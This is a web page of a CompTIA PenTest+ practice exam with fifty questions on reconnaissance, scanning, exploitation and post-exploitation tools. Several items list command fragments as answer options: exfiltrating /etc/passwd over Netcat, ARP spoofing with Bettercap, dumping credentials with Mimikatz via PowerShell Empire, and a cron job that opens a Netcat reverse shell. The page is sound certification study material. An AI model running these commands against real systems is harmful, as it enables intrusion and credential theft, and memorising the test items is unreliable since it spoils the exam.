Free CompTIA PenTest+ Practice Exam


What is a DNS lookup?

Question 1 of 50


Write down the command to perform OSINT using theHarvester while targeting using all of the search engines available to the tool and output the results into a file called theHarvester_google.html.

Question 2 of 50


What is the purpose of Shodan?

Question 3 of 50


Can we use -Pn and -sn Nmap switches in the same command?

Question 4 of 50


Which of these tools can be used to perform URL enumeration?

Question 5 of 50


What’s the difference between Nmap’s -sS and -sT scans?

Question 6 of 50


Name Nmap’s timing options from 0 to 5.

Question 7 of 50


What are the file formats Nessus can export its report into?

Question 8 of 50


What tool would we use to perform website scraping, and which one for website crawling?

Question 9 of 50


Is it possible to run the following Nmap command: nmap -Pn -sn -p- -T5 -O -A -sS -sT -sUV?

Question 10 of 50


Is there a way to ensure the validity of exploits found on Exploit Database?

Question 11 of 50


Name a good resource to keep yourself updated with the latest developments in the cyber security industry.

Question 12 of 50


Create a chain of commands to perform ARP spoofing using Bettercap. Assume that your network interface is eth0 and the target IP address is TARGET.

  • arp.spoof on
  • set arp.spoof.targets TARGET
  • bettercap --iface eth0
  • set arp.spoof.fullduplex true
  • help arp.spoof
  • help

Question 13 of 50


What is the main difference between John the Ripper and Hashcat in the way they crack passwords?

Question 14 of 50


Can a NIC’s MAC address be changed?

Question 15 of 50


What is the difference between an LHOST and an RHOST in Metasploit Framework?

Question 16 of 50


How would you transfer an /etc/passwd file from a compromised Linux system onto your attacking Kali machine using Netcat? The IP addresses are TARGET and KALI respectively.

  • On Kali
  • nc -lvnp PORT > target_passwd
  • nc KALI PORT < /etc/passwd
  • On the target shell

Question 17 of 50


Create an SQLi query that would read the contents of all the other columns while the 'user' column contains the value of 'admin' from the table 'users' within the current database.

Question 18 of 50


What are some of the main types of attacks we can perform after leveraging an XSS vulnerability?

Question 19 of 50


Which of these are we most commonly looking for when testing for vulnerabilities using a web proxy?

Question 20 of 50


When giving complex parameters to SQLMap, how do we ensure they are interpreted correctly by the tool?

Question 21 of 50


Besides the preinstalled wordlists found in Kali, what other major wordlist pack can we install?

Question 22 of 50


What’s the difference between phishing, spear phishing and whaling when it comes to social engineering?

Question 23 of 50


Which of these can be achieved through a watering hole attack?

Question 24 of 50


What is the name of a tool that can greatly increase the impact of our XSS attacks?

Question 25 of 50


What other tools does PowerShell Empire integrate well with?

Question 26 of 50


Create a chain of commands to use Mimikatz from within PowerShell Empire.

  • execute
  • service apache2 start
  • set Port 1234
  • execute
  • execute
  • usemodule powershell/credentials/mimikatz/logonpasswords
  • set Listener http
  • uselistener http
  • usestager windows/launcher_bat
  • cp /tmp/launcher.bat /var/www/html
  • Download and run the launcher.bat file using the target shell or GUI
  • powershell-empire

Question 27 of 50


BloodHound presents data to us using?

Question 28 of 50


Which Windows tools/services can we piggyback on through CrackMapExec?

Question 29 of 50


If / is allowed but no other command on a target system, how can we escape from a restricted shell?

Question 30 of 50


Write the command to create a Trojan using MSFVenom, LHOST being ATTACKER and the LPORT being PORT. The target machine is Linux, architecture x86, and the output file is called VIRUS.

Question 31 of 50


Which of the following can be used to create reverse or bind shells to a target system?

Question 32 of 50


Create a chain of commands to exploit a Cron job to achieve privilege escalation.

  • echo "#!/bin/bash">/tmp/
  • chmod 777 /tmp/
  • crontab -l
  • Identify a Cron job * * * * * /tmp/
  • nc -lvnp 2345
  • echo "nc 2345 -e /bin/bash">>/tmp/

Question 33 of 50


How do we cover our tracks if the shell we have is Meterpreter?

Question 34 of 50


Which of the following are steganography tools?

Question 35 of 50


Write a Bash loop that will print all numbers from 56 to 128 in increments of 5.

Question 36 of 50


What are “conditionals” in programming?

Question 37 of 50


What does the following command do:

nikto -h -Format html -o nikto_apple -Tuning 1

Question 38 of 50


How do we deal with cookie-based authentication on a target URL called TARGET when using Wapiti?

Question 39 of 50


Which particular item is necessary to make the most out of WPScan?

Question 40 of 50


Fill in the gaps in the command to perform password cracking using Hashcat on a hash file called “hash”, where the hash type is sha512crypt using the /usr/share/wordlists/rockyou.txt wordlist.

hashcat 1800 -a hash /usr/share/wordlists/rockyou.txt hash

Question 41 of 50


Which of the following are services that THC-Hydra can attack?

Question 42 of 50

When using a debugger for exploit development, ideally we want to achieve consistent control over which register?

Question 43 of 50

Name at least 3 wireless analysis and exploitation tools.

Question 44 of 50

Which of the following is the wireless parameter most commonly needed in wireless attacks?

Question 45 of 50

What is SSH?

Question 46 of 50


Write a command to run a basic Nmap port scan against a machine with the IP address of TARGET, but send the scan through a proxy.

Question 47 of 50


There are two ways you can “install” and run Powersploit on a Windows target. What are they?

Question 48 of 50


In order to capture credentials using Responder what condition needs to be met?

Question 49 of 50


Which of the following can be used to achieve Remote Code Execution (RCE) on a Windows target with known credentials using Impacket?

Question 50 of 50

